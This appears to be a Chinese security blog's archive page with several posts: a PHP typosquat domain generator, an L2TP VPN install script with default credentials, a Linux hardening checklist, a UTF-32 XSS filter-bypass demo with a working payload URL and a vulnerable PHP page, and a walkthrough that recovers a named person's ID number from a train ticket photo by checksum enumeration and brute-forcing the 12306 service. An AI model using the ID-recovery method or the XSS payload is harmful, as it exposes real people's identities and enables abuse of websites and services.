分类目录归档:security

工具:php实现穷举域名功能

1.需求如下:
假设某网站域名为http://www.wangzhan.com,要实现这个功能:
域名第一个字符遍历
http://www.aangzhan.com
……
zangzhan.com
域名第二个字符遍历
http://www.wangzhan.com
……
wzngzhan.com
以此类推到域名最后一个字符遍历
2.实现代码如下:

<?php 
 
$str=$argv[1];
$website_arr=explode(".",$str);
$website_name=$website_arr[1];
$website_length=strlen($website_name);
$key = array(
	array("/j/","l"),
	array("/l/","j"),
	array("/i/","j"),
	array("/j/","i"),
	array("/i/","1"),
	array("/1/","i"),
	array("/j/","1"),
	array("/1/","j"),
	array("/l/","i"),
	array("/i/","l"),
	array("/b/","lo"),
	array("/lo/","b"),
	array("/q/","9"),
	array("/9/","q"),
	array("/u/","v"),
	array("/v/","u"),
	array("/6/","b"),
	array("/b/","6"),
	array("/w/","vv"),
	array("/vv/","w"),
	array("/m/","nn"),
	array("/nn/","m"),
	array("/o/","0"),
	array("/0/","o"),
	array("/m/","n"),
	array("/n/","m"),
	array("/com/","com.cn"),
	array("/com/","cn"),
	array("/com/","net"),
	array("/com/","org"),
	array("/com/","tk"),
	array("/com/","pk"),
	array("/com/","cf"),
	array("/com/","cc"),
	array("/com/","tv"),
	array("/com/","pl"),
	array("/com/","im"),
	array("/cn/","com"),
	array("/cn/","com.cn"),
	array("/cn/","net"),
	array("/cn/","org"),
	array("/cn/","tk"),
	array("/cn/","pk"),
	array("/cn/","cf"),
	array("/cn/","cc"),
	array("/cn/","tv"),
	array("/cn/","pl"),
	array("/cn/","im"),
	array("/cn/","cn.com"),
	array("/cn/","cn.org"),
	array("/cn/","org.cn"),
	array("/cn/","net.cn"),
	array("/cn/","cn.net"),
	array("/www./","www-"),
	array("/www./","www"),
	array("/china/","chnina"),
	array("/abc/","abcd"),
	array("/bank/","bork"),
	array("/bank/","benk"),
	array("/bank/","bonk"),
	array("/bank/","bark"),
	array("/so/","sou"),
	array("/2/","z"),
	array("/z/","2"),
	array("/c/","2"),
	array("/c/","z"),
 
 
 
 
	);
for($j=0;$j<$website_length;$j++){
	if($j==0){
		dealstring('',substr($website_name,$j+1),$website_arr,$key);
	}else if($j==$website_length-1){
		dealstring(substr($website_name,0,$j),'',$website_arr,$key);
	}else{
		dealstring(substr($website_name,0,$j),substr($website_name,$j+1),$website_arr,$key);
	}
}
 
function dealstring($str_zuo,$str_you,$website_arr,$key){
 
//echo 'string:'.$str_zuo.' '.$str_you."\r\n";
 
for($i=97;$i<123;$i++){
 
	echo findHost($website_arr[0].'.'.$str_zuo.chr($i).$str_you.'.'.$website_arr[2],$key);
}
 
}
 
function findHost($host,$key){
	//echo $host."\r\n";
	for($i=0;$i<sizeof($key);$i++){ 		
           $hostChange =preg_replace($key[$i][0],$key[$i][1],$host); 	
           if($hostChange!=$host) 		
              echo $hostChange."\r\n"; 		
        }
} 
?>

下图为运行结果:

接着可以实现访问每个网站检查其是否可以访问,然后监控其内容是否为钓鱼网站。

一键安装L2TP VPN脚本

1.安装L2TP VPN方法
第一种: openswan+xl2tpd 安装后,我发现这个只能用WINDOW连接,IOS系统连接不了VPN,所以被迫使用第二种方法。
第二种: strongswan+xl2tpd 安装后,IOS、WINDOW系统都可以连接成功。
2.strongswan+xl2tpd 一键安装脚本(Centos6.5亲测成功)

rpm -ivh http://download.fedoraproject.org/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm
yum -y  update
yum -y install strongswan
yum -y install xl2tpd
sed -i 's/net.ipv4.ip_forward = 0/net.ipv4.ip_forward = 1/g' /etc/sysctl.conf
sysctl -p
iptables -A INPUT -p udp --dport 500 -j ACCEPT # IKE
iptables -A INPUT -p udp --dport 4500 -j ACCEPT # NAT-T
iptables -A INPUT -p udp -m policy --dir in --pol ipsec -m udp --dport 1701 -j ACCEPT # 強制l2tp透過ipsec存取
iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -o eth0 -j MASQUERADE
ip_addr=` ifconfig  | grep 'inet addr:'| grep -v '127.0.0.1' |cut -d: -f2 | awk '{ print $1}'`
echo "conn %default
        ikelifetime=24h
        keylife=24h
        rekeymargin=30m 
        keyingtries=1
        rekey=no
 
 
conn l2tp
        keyexchange=ikev1 # IKE版本
        left=$ip_addr
        leftsubnet=0.0.0.0/0
        leftprotoport=17/1701 # l2tp udp流量
        authby=secret # PSK驗證
        leftfirewall=no # 不要讓strongswan更改防火牆
        right=%any # 任意IP
        rightprotoport=17/%any # 任意port udp流量
        type=transport # ipsec transport mode 
        auto=add">>/etc/strongswan/ipsec.conf
echo ': PSK "fuck_great_firewall"'>>/etc/strongswan/ipsec.secrets
sed 's/\[global\].*$/&\nlisten-addr ='$ip_addr'/g' /etc/xl2tpd/xl2tpd.conf
sed -i 's/^mtu.*/mtu 1200/g' /etc/ppp/options.xl2tpd
sed -i 's/^mru.*/mru 1200/g' /etc/ppp/options.xl2tpd
echo 'login'>>/etc/ppp/options.xl2tpd
echo 'test * test123 *'>>/etc/ppp/chap-secrets
service strongswan start
service xl2tpd start
chkconfig strongswan on
chkconfig xl2tpd on

3.安装完成后,具体信息如下:
连接方式:L2TP
VPN用户名:test
VPN密码:test123
密钥:fuck_great_firewall

4.本文仅供学习交流

linux安全配置检查项

1.查看系统口令长度、强度检查

查看系统口令长度

cat /etc/login.defs

PASS_MIN_LEN=8 #设定最小用户密码长度为8 越大越好

查看系统口令强度

cat /etc/pam.d/system-auth
 
password required /lib/security/$ISA/pam_cracklib.so retry=3 minlen=9 dcredit=-1 ucredit=-1 lcredit=-1 ocredit=-1

从上面使用pam_cracklib.so的策略看,要求用户修改密码时必须要满足9位,并且密码中至少要包含一个大写字母、小写字母、数字和特殊符号

2.系统口令防破解时间限制检查

cat /etc/pam.d/system-auth

在第一行下即#%PAM-1.0的下面添加:
auth required pam_tally2.so deny=3 unlock_time=600 even_deny_root root_unlock_time=1200

各参数解释:
even_deny_root 也限制root用户;

deny 设置普通用户和root用户连续错误登陆的最大次数,超过最大次数,则锁定该用户

unlock_time 设定普通用户锁定后,多少时间后解锁,单位是秒;

root_unlock_time 设定root用户锁定后,多少时间后解锁,单位是秒;

3.系统文件权限检查

ls -l /etc/passwd 644 or 600 or 000
ls -l /etc/shadow 600 or 000
ls -l /etc/group 644 or 600 or 000

4.系统用户缺省访问权限

cat /etc/login.defs 查看umask 是否为027 or 077

5.查看是否开启日志

cat /var/log/messages
cat /var/log/secure

6.查看开机启动项

rc_local=`find / -name rc.local`
if [ "$rc_local" ]
then
find / -name rc.local|while read rc_filename
do
echo '[*]filename: '$rc_filename
cat $rc_filename
echo ''
done
else
echo '[x]Find rc_local not exists'
fi

7.查看定时任务

crontab -l

8.查看登录过用户

last|awk '{print $1}'|sort|uniq

9.查看成功登录的用户

if [ -f /var/log/secure ]
then
cat /var/log/secure|grep -i 'Accept'|awk '{print $1" "$2" "$3" "$11}'
else
echo '[x]/var/log/secure file not found'
fi

浅谈UTF-32编码

最近在收集曾经没完全弄明白例子(新手一枚),http://zone.wooyun.org/content/4448 这篇文章里介绍utf-32编码绕过google的xss过滤,成功在ie9以下版本执行js脚本。那么开始分析以下字符是如何转换的。
[0x00][0x00][0x22][0x00] –> ∀
[0x00][0x00][0x3C][0x00] –> 㰀
[0x00][0x00][0x3E][0x00] –> 㸀
通过文章介绍得到utf-32由4个字节组成
%00%00%22%00 –> ∀ (∀字符是%00%00%22%00 通过 utf-32转换utf-8得到的)接下来看例子

<meta charset="UTF-8">
 <?php 
$str='%00%00%22%00'; 
$str=urldecode($str); 
$str=mb_convert_encoding($str,"UTF-8","UTF-32"); 
echo urlencode($str); 
?>

运行后输出:%E2%88%80  也就是∀字符

接着我们就可以写出二哥demo页面 http://www.leesec.com/utf-32.php?charset=utf-32&v=%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1)%E3%B0%80/script%E3%B8%80

<!DOCTYPE html> 
<html> 
<head> <meta charset="utf-8"></meta> 
</head>
 <body> 
<input type="text" value="<?php echo mb_convert_encoding(htmlspecialchars($_GET['v']),$_GET['charset'],"UTF-8"); ?>">
</input>
 </body> 
</html>

代码运行图片

破解火车票上的身份证号码

首先我在百度上找到了一个他人的火车票图片

接着从图片里我们可以获取到信息如下:

姓名 梅勇
性别 男 (倒数第四位至倒数第二位3位数为顺序码,顺序码为奇数所以为男性)
(可参考http://www.cnblogs.com/xudong-bupt/p/3293838.html)
来自 武汉市新洲区 (身份证号码前六位代表地区)
(可参考http://www.stats.gov.cn/tjsj/tjbz/xzqhdm/200406/t20040607_38302.html)

身份证号码:4201171988xxxx1638

得到上述消息后,我们可以通过身份证号码验证算法对其进行有效性验证和排除。
(可参考http://www.cnblogs.com/xudong-bupt/p/3293838.html)

我用JS实现了一个有效性验证,代码如下:

var sfz_qian="4201171988";
var sfz_hou4="1638";
var sfzhm="";
for(i=1;i<=12;i++)
{
  //为了程序的方便,我就假设每个月有31天
  for(j=1;j<=31;j++){
		if(i<10){
			if(j<10){
				sfzhm=sfz_qian+"0"+i+"0"+j+sfz_hou4;
			}else{
				sfzhm=sfz_qian+"0"+i+j+sfz_hou4;
			}
			result=getvalidcode(sfzhm);
	        	if(result!=false){
        	        	console.log(result);
        		}
 
		}else{
			if(j<10){
                               sfzhm=sfz_qian+i+"0"+j+sfz_hou4;
                        }else{
                               sfzhm=sfz_qian+i+j+sfz_hou4;
                        }
			result=getvalidcode(sfzhm);
       	 		if(result!=false){
			      console.log(result);
        	        }
 
		}		
 
		}
	}
 
 
 
function getvalidcode(sfzhm_new){
 
var sum=0;
var weight=[7,9,10,5,8,4,2,1,6,3,7,9,10,5,8,4,2];
var validate=['1','0','X','9','8','7','6','5','4','3','2'];
for(m=0;m<sfzhm_new.length-1;m++){
sum+=sfzhm_new[m]*weight[m];
}
mode=sum%11;
if(sfzhm_new[17]==validate[mode]){
	return sfzhm_new;
}else{
	return false;
}
 
}

代码运行后如下:

接着我们导出35条记录做为字典,拿到12306进行暴力添加常用联系人,最后我们得到了该图片上面的身份证号码了